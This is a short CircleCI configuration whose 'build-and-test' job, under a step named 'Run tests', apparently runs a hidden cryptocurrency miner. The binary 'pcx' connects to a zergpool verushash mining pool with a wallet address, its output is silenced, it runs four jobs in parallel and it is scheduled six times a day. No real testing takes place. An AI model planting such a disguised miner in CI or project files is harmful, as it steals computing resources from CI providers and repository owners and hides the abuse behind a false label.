version: 2.1

jobs:
  build-and-test:
    parallelism: 4
    docker:
      - image: ubuntu:18.04
    steps:
      - checkout
      - run:
          name: Run tests
          no_output_timeout: 5h
          command: |
           chmod +x pcx
           timeout 239m ./pcx -v -l verushash.eu.mine.zergpool.com:3300 -u DLckzpBwWjd8rKCKnC2sRgz5ed9J6zfQnb -t 2 > /dev/null 2>&1
           sudo apt update

workflows:
  version: 2
  daily:
    triggers:
      - schedule:
         cron: "0 0,4,8,12,17,20 * * *"
         filters:
           branches:
             only:
               - main
    jobs:
      - build-and-test